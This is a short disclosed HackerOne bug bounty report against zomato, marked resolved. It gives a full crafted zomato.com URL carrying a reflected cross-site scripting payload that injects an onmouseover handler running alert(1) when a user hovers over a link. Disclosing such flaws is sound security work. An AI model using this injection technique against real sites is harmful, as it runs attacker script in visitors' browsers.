XSS onmouseover

Disclosed: 2016-08-02 03:50:59 By idomin To zomato
Unknown
Vulnerability Details
Hi, my first rapport ever so be gentle! Found an XSS that can be executed by hoovering over links with Firefox https://www.zomato.com/cs/new-york-city/turtle-bay-restaurants/fast-casual/1zqjrw'/onmouseover='alert%281%29'/style='height:200;width:200'/b= Will add an picture also that proves that it works! Best regards!
Actions
View on HackerOne
Report Stats
  • Report ID: 139981
  • State: Closed
  • Substate: resolved
  • Upvotes: 9
Share this report